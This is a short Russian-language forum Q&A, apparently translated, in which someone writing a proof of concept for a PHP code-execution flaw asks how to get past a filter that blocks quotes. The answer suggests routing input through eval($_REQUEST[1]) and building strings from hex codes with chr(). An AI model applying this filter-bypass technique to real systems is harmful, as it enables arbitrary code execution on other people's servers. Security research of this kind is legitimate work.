Я пишу POC уязвимости выполнения PHP-кода, но у меня есть фильтр, который я не могу обойти, просто я могу выполнить любую функцию, не используя кавычки " ' '
. Я попытался выполнить некоторые коды, такие как dirscan(getcwd())
и phpinfo()
но это не сработало, но я не мог найти какую-либо функцию для ее использования для кодирования и декодирования чисел для строк или других способов использования $_REQUEST
и $_SERVER
vars
есть старый base64_decode
но ему также нужны кавычки.
так что любые мысли, чтобы выполнить любой код, который я хочу?
Используйте форму со входом вроде:
<input type=text name=1>
Тогда скрипт PHP может сделать:
eval($_REQUEST[1]);
Следующий код может генерировать строку без использования кавычек:
$array = [ 0x48, 0x45, 0x4c, 0x4c, 0x4f ];
$string = array_reduce($array, function ($a, $b) { return $a . chr($b); });
echo $string; // Prints "HELLO"